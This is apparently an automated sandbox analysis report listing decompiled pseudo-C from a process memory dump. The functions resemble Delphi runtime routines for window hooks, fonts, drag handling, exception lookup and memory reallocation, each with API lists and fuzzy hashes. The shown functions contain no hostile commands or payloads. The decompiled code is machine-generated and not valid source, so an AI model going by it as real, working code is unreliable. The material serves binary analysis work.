                                                                            • Instruction Fuzzy Hash: F2F0A7E120811476D53077B66C8282B198C8928368F02657BFA82E3297D56CEC4142BE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0045539C(void* __ecx) {
    void* _t2;
    DWORD* _t7;

    _t2 = *0x466580; // 0x27bf470
    if( *((char*)(_t2 + 0xad)) == 0) {
        if( *0x466598 == 0) {
            _t2 = SetWindowsHookExA(3, E00455358, 0, GetCurrentThreadId());
            *0x466598 = _t2;
        }
        if( *0x466594 == 0) {
            _t2 = CreateEventA(0, 0, 0, 0);
            *0x466594 = _t2;
        }
        if( *0x46659c == 0) {
            _t2 = CreateThread(0, 0x3e8, E004552FC, 0, 0, _t7);
            *0x46659c = _t2;
        }
    }
    return _t2;
}

                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004553B4
                                                                            • SetWindowsHookExA.USER32 ref: 004553C4
                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0045834E), ref: 004553DF
                                                                            • CreateThread.KERNEL32 ref: 00455403
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CreateThread$CurrentEventHookWindows
                                                                            • String ID:
                                                                            • API String ID: 1195359707-0
                                                                            • Opcode ID: 096523d17a34ecf0d97c422ae2d5a8432442c6bfb133b99b9dcf8aa6461ea1bb
                                                                            • Instruction ID: a9d03a39fb95b2e519a0ab36c9fe0646124770ff35457d36c1f1fd7bedb10476
                                                                            • Opcode Fuzzy Hash: 096523d17a34ecf0d97c422ae2d5a8432442c6bfb133b99b9dcf8aa6461ea1bb
                                                                            • Instruction Fuzzy Hash: A6F01D70784780BEF610AB21BC17B2636949715B16F21517AF50A791D7E2F824888A5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0042ACC4() {
    signed char _v28;
    void* _t4;
    signed int _t8;
    struct HDC__* _t9;
    struct tagTEXTMETRICA* _t10;

    _t8 = 1;
    _t9 = GetDC(0);
    if(_t9 != 0) {
        _t4 = *0x466360; // 0x58a00b4
        if(SelectObject(_t9, _t4) != 0 && GetTextMetricsA(_t9, _t10) != 0) {
            _t8 = _v28 & 0x000000ff;
        }
        ReleaseDC(0, _t9);
    }
    return _t8;
}

                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 0042ACCD
                                                                            • SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF
                                                                            • GetTextMetricsA.GDI32(00000000), ref: 0042ACEA
                                                                            • ReleaseDC.USER32 ref: 0042ACFB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsObjectReleaseSelectText
                                                                            • String ID:
                                                                            • API String ID: 2013942131-0
                                                                            • Opcode ID: 7c5f333ca835aeb22dd702a433e5b6b0fb194056d32f62b4152f717a2231f0a9
                                                                            • Instruction ID: de7c194213a4f2e578b42373dec20c7b80f31d2e9068f76ebd383a2718700f4b
                                                                            • Opcode Fuzzy Hash: 7c5f333ca835aeb22dd702a433e5b6b0fb194056d32f62b4152f717a2231f0a9
                                                                            • Instruction Fuzzy Hash: 23E0DF1174A23123D21032663C82BAB218C4F023A5F89013BFD24E93C1DA0DCD2083FF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 70%
E00438C24(signed int __eax) {
    signed int _v5;
    signed int _v12;
    signed int _v13;
    intOrPtr _v17;
    intOrPtr _v21;
    void* __ebx;
    void* __ebp;
    signed int _t46;
    signed int _t47;
    signed int _t48;
    signed int _t49;
    signed int _t52;
    signed int _t53;
    void* _t54;
    signed int _t55;
    struct HICON__* _t56;
    intOrPtr _t61;
    signed int _t65;
    signed int _t69;
    signed int _t71;
    void* _t72;
    signed int _t76;
    signed int _t77;
    void* _t80;
    signed int _t81;
    intOrPtr _t82;
    signed int _t87;
    signed int _t90;
    signed int _t91;
    intOrPtr* _t97;
    void* _t100;
    signed int _t104;
    intOrPtr _t113;
    intOrPtr _t116;
    signed int _t118;
    signed int _t120;
    signed int _t122;
    signed int _t124;
    intOrPtr _t127;
    signed int _t128;
    signed int _t129;
    intOrPtr _t136;
    intOrPtr _t138;
    void* _t140;
    void* _t141;
    void* _t143;
    void* _t145;
    intOrPtr _t146;

    _t46 = __eax;
    _t143 = _t145;
    _t146 = _t145 + 0xffffffec;
    _v5 = __eax;
    _t97 = 0;
    _v13 = 0;
    if( *0x466514 == 0) {
        L36:
        return _t46;
    } else {
        _t46 = *0x466514; // 0x0
        if( *((char*)(_t46 + 5)) != 0) {
            goto L36;
        } else {
            _push(_t143);
            _push(0x438f39);
            _push( *[fs:edx]);
            *[fs:edx] = _t146;
            _t47 = *0x466514; // 0x0
            *0x466540 = _t47;
            _push(_t143);
            _push(0x438ec7);
            _push( *[fs:edx]);
            *[fs:edx] = _t146;
            _t48 = *0x466514; // 0x0
            *((char*)(_t48 + 5)) = 1;
            _t49 = *0x466514; // 0x0
            *((char*)(_t49 + 0x20)) = _v5 & 0x000000ff;
            _t113 = *0x46651c; // 0x0
            E00437AA4(_t113);
            if( *0x466530 == 2) {
                _t91 = *0x466514; // 0x0
                _t138 = *0x43519c; // 0x4351e8
                _t97 = E00403AD8(_t91, _t138);
                *((char*)(_t97 + 0x74)) = *((intOrPtr*)( *_t97 + 0x34))() & 0xffffff00 | *((intOrPtr*)(_t97 + 8)) == 0x00000000;
            }
            _t52 = *0x466514; // 0x0
            if( *((intOrPtr*)(_t52 + 8)) == 0) {
                L7:
                _t53 = *0x466514; // 0x0
                _v21 = *((intOrPtr*)(_t53 + 0x10));
                _t115 = *((intOrPtr*)(_t53 + 0x14));
                _v17 = *((intOrPtr*)(_t53 + 0x14));
            } else {
                _t87 = *0x466514; // 0x0
                _t136 = *0x4362e8; // 0x436334
                if(E00403AB4( *((intOrPtr*)(_t87 + 8)), _t136) == 0) {
                    goto L7;
                } else {
                    _t90 = *0x466514; // 0x0
                    _v21 = *((intOrPtr*)(_t90 + 0x18));
                    _t115 = *((intOrPtr*)(_t90 + 0x1c));
                    _v17 = *((intOrPtr*)(_t90 + 0x1c));
                }
            }
            _t54 = E00438BB0(_t143);
            _pop(_t100);
            if(_t54 == 0) {
                L14:
                _t55 = 0;
            } else {
                if( *0x466530 != 2 || *((char*)(_t97 + 0x74)) == 0) {
                    if( *0x466530 == 0) {
                        goto L14;
                    } else {
                        E004384B8(1);
                        if(1 == 0) {
                            goto L14;
                        } else {
                            goto L13;
                        }
                    }
                } else {
                    L13:
                    if(_v5 != 0) {
                        _t55 = 1;
                    } else {
                        goto L14;
                    }
                }
            }
            _v13 = _t55;
            if( *0x466530 != 2) {
                __eflags = *0x466534;
                if(__eflags == 0) {
                    _t56 = *0x466528; // 0x0
                    SetCursor(_t56);
                } else {
                    _t77 = *0x466534; // 0x0
                    E004440E4(_t77, _t115, __eflags);
                }
            } else {
                if(_v13 != 0 && *((char*)(_t97 + 0x74)) != 0) {
                    _t80 = E0044CE28( *((intOrPtr*)(_t97 + 0x40)));
                    if(_t80 != 0 && *((intOrPtr*)(_t80 + 0x268)) == *((intOrPtr*)(_t97 + 0x40))) {
                        E00451654(_t80, _t97, _t100, 0, _t140, _t141);
                    }
                    _t81 = *0x466514; // 0x0
                    _t82 = *0x466510; // 0x0
                    E0043BC9C(_t82, 0, 0xb03a, _t81);
                }
            }
            *0x466510 = 0;
            *0x466514 = 0;
            if( *0x466540 == 0) {
                L33:
                _pop(_t116);
                *[fs:eax] = _t116;
                _push(0x438ece);
                _t61 = *0x46653c; // 0x0
                E00403928(_t61);
                *0x46653c = 0;
                __eflags = *0x466540;
                if( *0x466540 != 0) {
                    _t65 = *0x466540; // 0x0
                    *((char*)(_t65 + 5)) = 0;
                    _t69 = *0x466540; // 0x0
                    *((intOrPtr*)( *_t69))(_v13 & 0x000000ff, _v17);
                }
                __eflags = 0;
                *0x466514 = 0;
                return 0;
            } else {
                _t71 = *0x466540; // 0x0
                if( *((intOrPtr*)(_t71 + 8)) == 0) {
                    goto L33;
                } else {
                    _t72 = 3;
                    if(_v13 == 0) {
                        _t72 = 4;
                        _t128 = *0x466540; // 0x0
                        *((intOrPtr*)(_t128 + 0x10)) = 0;
                        _t129 = *0x466540; // 0x0
                        *((intOrPtr*)(_t129 + 0x14)) = 0;
                        _v21 = 0;
                        _v17 = 0;
                    }
                    _t118 = *0x466540; // 0x0
                    _v12 = _t118;
                    _push(_t143);
                    _push(0x438e6b);
                    _push( *[fs:edx]);
                    *[fs:edx] = _t146;
                    _t120 = *0x466540; // 0x0
                    _t122 = *0x466540; // 0x0
                    _t124 = *0x466540; // 0x0
                    _t104 = *0x466540; // 0x0
                    E00438384( *((intOrPtr*)(_t124 + 0xc)), _t104, _t72, _t122 + 0x10, *((intOrPtr*)(_t120 + 8)));
                    _pop(_t127);
                    *[fs:eax] = _t127;
                    _push(0x438e72);
                    if( *0x466540 == 0) {
                        _t76 = _v12;
                        *0x466540 = _t76;
                        return _t76;
                    }
                    return 0;
                }
            }
        }
    }
}


                                                                            APIs
                                                                              • Part of subcall function 00437AA4: ReleaseCapture.USER32(00000000,00438C9B,00000000,00438EC7,?,00000000,00438F39), ref: 00437AA7
                                                                            • SetCursor.USER32(00000000,00000000,00438EC7,?,00000000,00438F39), ref: 00438DB3
                                                                              • Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100
                                                                            Strings
                                                                            • 4cC , xrefs: 00438CDA
                                                                            • QC , xrefs: 00438CA9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CaptureCursorDragImageList_Release
                                                                            • String ID: 4cC$QC
                                                                            • API String ID: 1302740870-1275598162
                                                                            • Opcode ID: fde60272e4a0214f13f4deac0b405d54ad89552e2e762a055d0ae2e8f1311e0a
                                                                            • Instruction ID: dc2065d6e0f599aa4aa913a50c49f208dad52c561c5e25ae754aa2762872304a
                                                                            • Opcode Fuzzy Hash: fde60272e4a0214f13f4deac0b405d54ad89552e2e762a055d0ae2e8f1311e0a
                                                                            • Instruction Fuzzy Hash: 69819670604340AFD715CF18E846B56FBE1BB58308F1591BBE805873AAEB789941CB9A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                                                                                  E0042590C(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) { 				signed int _v8; 				struct tagLOGFONTA _v68; 				int _v72; 				char _v76; 				char _v80; 				char _v84; 				intOrPtr _t87; 				intOrPtr _t91; 				intOrPtr _t97; 				signed int _t106; 				char* _t110; 				int _t115; 				intOrPtr* _t121; 				void* _t124; 				void* _t138; 				intOrPtr _t149; 				int _t161; 				int* _t162; 				int _t164; 				void* _t167; 				void* _t168; 				intOrPtr _t169; 				int* _t181;  				_t167 = _t168; 				_t169 = _t168 + 0xffffffb0; 				_v84 = 0; 				_v80 = 0; 				_v76 = 0; 				_v72 = 0; 				_t138 = __eax; 				_push(_t167); 				_push(0x425b28); 				_push( *[fs:eax]); 				 *[fs:eax] = _t169; 				_v8 =  *((intOrPtr*)(__eax + 0x10)); 				if( *((intOrPtr*)(_v8 + 8)) != 0) { 					__eflags = 0; 					 *[fs:eax] = 0; 					_push(E00425B2F); 					return E00404760( &_v84, 4); 				} else { 					_t87 =  *0x466398; // 0x27f1bc8 					E00424BEC(_t87); 					_push(_t167); 					_push(0x425b00); 					_push( *[fs:edx]); 					 *[fs:edx] = _t169; 					if( *((intOrPtr*)(_v8 + 8)) == 0) { 						_t12 = _v8 + 0x14; // 0xe8c38bd6 						_v68.lfHeight =  *_t12; 						_v68.lfWidth = 0; 						_t16 = _v8 + 0x18; // 0xffffff88 						_t97 =  *_t16; 						_v68.lfEscapement = _t97; 						_v68.lfOrientation = _t97; 						if(( *(_v8 + 0x1d) & 0x00000001) == 0) { 							_v68.lfWeight = 0x190; 						} else { 							_v68.lfWeight = 0x2bc; 						} 						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000002) != 0x00000000; 						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000004) != 0x00000000; 						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x1d) & 0x00000008) != 0x00000000; 						_t47 = _v8 + 0x1e; // 0x5a590424 						_t106 =  *_t47 & 0x000000ff; 						if(_t106 != 1) { 							L8: 							_v68.lfCharSet = _t106; 						} else { 							_t177 =  
*0x461c3a - 1; 							if( *0x461c3a == 1) { 								goto L8; 							} else { 								_v68.lfCharSet =  *0x461c3a & 0x000000ff; 							} 						} 						E004049A0( &_v72, _v8 + 0x1f, _t177); 						_t164 = _v72; 						if(_t164 != 0) { 							_t164 =  *(_t164 - 4); 						} 						_t161 = "Default"; 						if(_t161 != 0) { 							_t162 = _t161 - 4; 							_t181 = _t162; 							_t161 =  *_t162; 						} 						_t110 = E00404C00("Default"); 						E004049A0( &_v76, _v8 + 0x1f, _t181); 						_t115 = CompareStringA(0x400, 1, E00404C00(_v76), _t164, _t110, _t161); 						_t182 = _t115 != 2; 						if(_t115 != 2) { 							__eflags = _v8 + 0x1f; 							E004049A0( &_v84, _v8 + 0x1f, _v8 + 0x1f); 							E004090B0( &(_v68.lfFaceName), _v84); 						} else { 							E004049A0( &_v80, 0x461c3b, _t182); 							E004090B0( &(_v68.lfFaceName), _v80); 						} 						_t121 =  *0x462f2c; // 0x4617c0 						if( *_t121 == 1 && E0042ACC4() == 0x80 && E004258E0(_v8 + 0x10) != 0) { 							_v68.lfCharSet = 0x80; 						} 						_v68.lfQuality = 0; 						if(_v68.lfOrientation == 0) { 							_v68.lfOutPrecision = 0; 						} else { 							_v68.lfOutPrecision = 7; 						} 						_v68.lfClipPrecision = 0; 						_t124 = E00425C84(_t138) - 1; 						if(_t124 == 0) { 							_v68.lfPitchAndFamily = 2; 						} else { 							if(_t124 == 1) { 								_v68.lfPitchAndFamily = 1; 							} else { 								_v68.lfPitchAndFamily = 0; 							} 						} 						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68); 					} 					_pop(_t149); 					 *[fs:eax] = _t149; 					_push(E00425B07); 					_t91 =  *0x466398; // 0x27f1bc8 					return E00424BF8(_t91); 				} 			}                        


                                                                            APIs
                                                                              • Part of subcall function 00424BEC: EnterCriticalSection.KERNEL32(027F1C10,004261DF), ref: 00424BF0
                                                                            • CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,00425B00,?,00000000,00425B28,?,?,?,?), ref: 00425A3B
                                                                            • CreateFontIndirectA.GDI32(?), ref: 00425ADD
                                                                            Strings
                                                                            • Default , xrefs: 00425A02, 00425A10, 00425A11
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                                                            • String ID: Default
                                                                            • API String ID: 249151401-753088835
                                                                            • Opcode ID: b1e62e2ab3e285c66bfabbfe6c2abf817a5687709a25f266933a54f1d7d2a055
                                                                            • Instruction ID: cdc74d9fd1ebb00f32cf96949c10078f4083309e396aabd750659c696ce78f0f
                                                                            • Opcode Fuzzy Hash: b1e62e2ab3e285c66bfabbfe6c2abf817a5687709a25f266933a54f1d7d2a055
                                                                            • Instruction Fuzzy Hash: 6961C570B04658DFDB10DFA8D481B9EBBF5AF49304FA54066E400B7392D378AE41CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E00446F1C(int __eax, signed int __ecx, void* __edx, void* __fp0, char* _a4, intOrPtr _a8, intOrPtr _a12) { 				signed int _v5; 				char _v12; 				struct tagMSG _v40; 				char _v48; 				void* __ebp; 				int _t33; 				int _t40; 				intOrPtr _t41; 				char* _t42; 				int _t45; 				int _t58; 				intOrPtr _t72; 				int _t79; 				int _t80; 				void* _t81; 				void* _t87;  				_t87 = __fp0; 				_t33 = __eax; 				_v5 = __ecx; 				_t58 = __eax; 				if(__edx != 0) { 					L17: 					return _t33; 				} 				_t83 = _v5 & 0x00000040; 				if((_v5 & 0x00000040) == 0) { 					E0041938C(_a12,  &_v48, _a8); 					_t61 =  &_v12; 					_t33 = E00445384(_t58,  &_v12,  &_v48, __eflags); 					_t79 = _t33; 					__eflags = _t79; 					if(_t79 == 0) { 						goto L17; 					} 					__eflags = _v12 - 0x12; 					if(__eflags != 0) { 						__eflags = _v12 - 2; 						if(_v12 != 2) { 							goto L17; 						} 						_t40 = PeekMessageA( &_v40, E004423F8( *((intOrPtr*)(_t58 + 0x14))), 0x203, 0x203, 0); 						__eflags = _t40; 						if(_t40 == 0) { 							_t72 =  *0x4369e8; // 0x436a34 							_t45 = E00403AB4( *((intOrPtr*)(_t79 + 4)), _t72); 							__eflags = _t45; 							if(_t45 != 0) { 								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t79 + 4)))) + 0xd4))(); 							} 						} 						_t41 =  *((intOrPtr*)(_t79 + 4)); 						__eflags =  *((char*)(_t41 + 0x8f)) - 1; 						if( *((char*)(_t41 + 0x8f)) == 1) { 							__eflags =  *((char*)(_t41 + 0x5d)) - 1; 							if( *((char*)(_t41 + 0x5d)) == 1) { 								__eflags = 0; 								E0043B120(_t41, _t61 | 0xffffffff, 0, _t81, _t87); 							} 						} 						_t42 = _a4; 						 *_t42 = 1; 						return _t42; 					} 					E0041938C(_a12,  &_v48, _a8); 					return E00446600(_t58,  &_v48, _t79, __eflags); 				} 				E0041938C(_a12,  &_v48, _a8); 				_t33 = E00445384(_t58,  &_v12,  &_v48, _t83); 				_t80 = _t33; 				if(_t80 != 0 &&  
*((intOrPtr*)(_t80 + 4)) != 0 && _v12 == 2) { 					E00438F48(); 					return E0043B7E4( *((intOrPtr*)(_t80 + 4)), 0, 0, 1); 				} 				goto L17; 			}                        


                                                                            Strings
                                                                            • @ , xrefs: 00446F31
                                                                            • 4jC , xrefs: 00446FFA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: PointsWindow
                                                                            • String ID: 4jC$@
                                                                            • API String ID: 4123100037-871394707
                                                                            • Opcode ID: 28da6f578e5690cc0c5caff51d9c003871ca2833c0e4f4482c9042230a3108b2
                                                                            • Instruction ID: 86af40c0e3280406c22fdaa537b1eb5ee5ae63b826341ce694b4907392a73c8c
                                                                            • Opcode Fuzzy Hash: 28da6f578e5690cc0c5caff51d9c003871ca2833c0e4f4482c9042230a3108b2
                                                                            • Instruction Fuzzy Hash: 5131A230A052089BEF20DF68C895BDEB7A5AF14354F00C1ABEC5167382CB78ED45CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                                                                                  E0040C572(void* __ebx, void* __esi, intOrPtr _a4) { 				char _v8; 				struct _MEMORY_BASIC_INFORMATION _v36; 				char _v297; 				char _v304; 				intOrPtr _v308; 				char _v312; 				char _v316; 				char _v320; 				intOrPtr _v324; 				char _v328; 				void* _v332; 				char _v336; 				char _v340; 				char _v344; 				char _v348; 				intOrPtr _v352; 				char _v356; 				char _v360; 				char _v364; 				void* _v368; 				char _v372; 				intOrPtr _t52; 				intOrPtr _t60; 				intOrPtr _t82; 				intOrPtr _t86; 				intOrPtr _t89; 				intOrPtr _t100; 				void* _t107; 				intOrPtr _t109; 				void* _t112;  				_v372 = 0; 				_v336 = 0; 				_v344 = 0; 				_v340 = 0; 				_v8 = 0; 				_push(_t112); 				_push(0x40c72f); 				_push( *[fs:eax]); 				 *[fs:eax] = _t112 + 0xfffffe90; 				_t89 =  *((intOrPtr*)(_a4 - 4)); 				if( *((intOrPtr*)(_t89 + 0x14)) != 0) { 					_t52 =  *0x462dac; // 0x407654 					E00406740(_t52,  &_v8); 				} else { 					_t86 =  *0x462f40; // 0x40764c 					E00406740(_t86,  &_v8); 				} 				_t109 =  *((intOrPtr*)(_t89 + 0x18)); 				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c); 				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) { 					_v368 =  *(_t89 + 0xc); 					_v364 = 5; 					_v360 = _v8; 					_v356 = 0xb; 					_v352 = _t109; 					_v348 = 5; 					_t60 =  *0x462db8; // 0x4075fc 					E00406740(_t60,  &_v372); 					E0040C158(_t89, _v372, 1, _t107, _t109, "true",  &_v368); 				} else { 					_v332 =  *(_t89 + 0xc); 					_v328 = 5; 					E004049AC( &_v340, 0x105,  &_v297); 					E00408F20(_v340,  &_v336); 					_v324 = _v336; 					_v320 = 0xb; 					_v316 = _v8; 					_v312 = 0xb; 					_v308 = _t109; 					_v304 = 5; 					_t82 =  *0x462e34; // 0x407714 					E00406740(_t82,  &_v344); 					E0040C158(_t89, _v344, 1, _t107, _t109, 3,  &_v332); 				} 				_pop(_t100); 				 *[fs:eax] = _t100; 				_push(E0040C736); 				
E0040473C( &_v372); 				E00404760( &_v344, 3); 				return E0040473C( &_v8); 			}                        


                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            Strings
                                                                            • Lv@ , xrefs: 0040C5B9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                                            • String ID: Lv@
                                                                            • API String ID: 902310565-2306355798
                                                                            • Opcode ID: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace
                                                                            • Instruction ID: 312cfa349de001423b8fa7d1abb7a1f31512e968929e1d2ab1301cf878b75628
                                                                            • Opcode Fuzzy Hash: a64f8a922244f8bc9df9dcd3d48b1ff787754f54841e870c1e5b0c2d58ac1ace
                                                                            • Instruction Fuzzy Hash: AB311870900658DFDB61DB64CD81BDAB7F9AB49304F4040FAE508A7291E7B8AE848F55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                                                                                  E00401D68(signed int __eax, signed int __edx, void* __edi) { 				signed int _t58; 				signed int _t73; 				signed int _t80; 				signed int _t86; 				signed int _t94; 				signed int _t100; 				void* _t102; 				signed int _t111; 				signed int _t119; 				signed int _t125; 				signed int _t131; 				signed int _t133; 				signed int _t136; 				intOrPtr _t139; 				void* _t141; 				signed int _t143; 				signed int _t145; 				unsigned int _t146; 				signed int _t153; 				unsigned int _t154; 				intOrPtr _t157; 				void* _t160; 				intOrPtr _t168; 				intOrPtr _t170; 				signed int _t173; 				signed int _t174; 				signed int _t175; 				void* _t182; 				unsigned int _t184; 				signed int _t190; 				signed int _t193; 				signed int _t195; 				signed int _t196; 				signed int _t198; 				void* _t202; 				signed int _t203; 				signed int _t204; 				void* _t205; 				signed int _t208;  				_t181 = __edi; 				_t166 = __edx; 				_t145 =  *(__eax - 4); 				_t196 = __eax; 				if((_t145 & 0x00000007) != 0) { 					__eflags = _t145 & 0x00000005; 					if((_t145 & 0x00000005) != 0) { 						__eflags = _t145 & 0x00000003; 						if((_t145 & 0x00000003) != 0) { 							__eflags = 0; 							return 0; 						} else { 							_t146 = _t145 - 0x18; 							__eflags = __edx - _t146; 							if(__edx <= _t146) { 								__eflags = __edx - _t146 >> 1; 								if(__edx < _t146 >> 1) { 									_t131 = __edx; 									_t58 = E00401820(__edx); 									__eflags = _t58; 									if(_t58 == 0) { 										goto L61; 									} else { 										__eflags = _t131 - 0x40a2c; 										if(_t131 > 0x40a2c) { 											 *((intOrPtr*)(_t58 - 8)) = _t131; 										} 										E004015A0(_t196, _t131, _t58); 										E00401B88(_t196, _t181); 										return _t58; 									} 								} else { 									 *((intOrPtr*)(__eax - 8)) = __edx; 									return __eax; 								} 							} else { 								
asm("adc eax, 0xffffffff"); 								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx; 								_push(__edx); 								_t58 = E00401820((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx); 								_pop(_t168); 								__eflags = _t58; 								if(_t58 != 0) { 									__eflags = _t133 - 0x40a2c; 									if(_t133 > 0x40a2c) { 										 *((intOrPtr*)(_t58 - 8)) = _t168; 									} 									E00401570(_t196,  *((intOrPtr*)(_t196 - 8)), _t58); 									E00401B88(_t196, _t181); 									return _t58; 								} 								L61: 								return _t58; 							} 						} 					} else { 						_t153 = _t145 & 0xfffffff0; 						_push(__edi); 						_t182 = _t153 + __eax; 						_t154 = _t153 - 4; 						_t136 = _t145 & 0x0000000f; 						__eflags = __edx - _t154; 						if(__edx > _t154) { 							_t73 =  *(_t182 - 4); 							__eflags = _t73 & 0x00000001; 							if((_t73 & 0x00000001) == 0) { 								L51: 								asm("adc edi, 0xffffffff"); 								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166; 								_t184 = _t154; 								_t80 = E00401820(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166); 								_t170 = _t166; 								__eflags = _t80; 								if(_t80 == 0) { 									goto L49; 								} else { 									__eflags = _t198 - 0x40a2c; 									if(_t198 > 0x40a2c) { 										 *((intOrPtr*)(_t80 - 8)) = _t170; 									} 									E00401570(_t196, _t184, _t80); 									E00401B88(_t196, _t184); 									return _t80; 								} 							} else { 								_t86 = _t73 & 0xfffffff0; 								_t202 = _t154 + _t86; 								__eflags = __edx - _t202; 								if(__edx > _t202) { 									goto L51; 								} else { 									__eflags =  *0x46304d; 									if(__eflags == 0) { 										L42: 										__eflags = _t86 - 0xb30; 										if(_t86 >= 0xb30) { 											E004015BC(_t182); 											_t166 = _t166; 											_t154 = _t154; 										} 										asm("adc edi, 0xffffffff"); 										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 
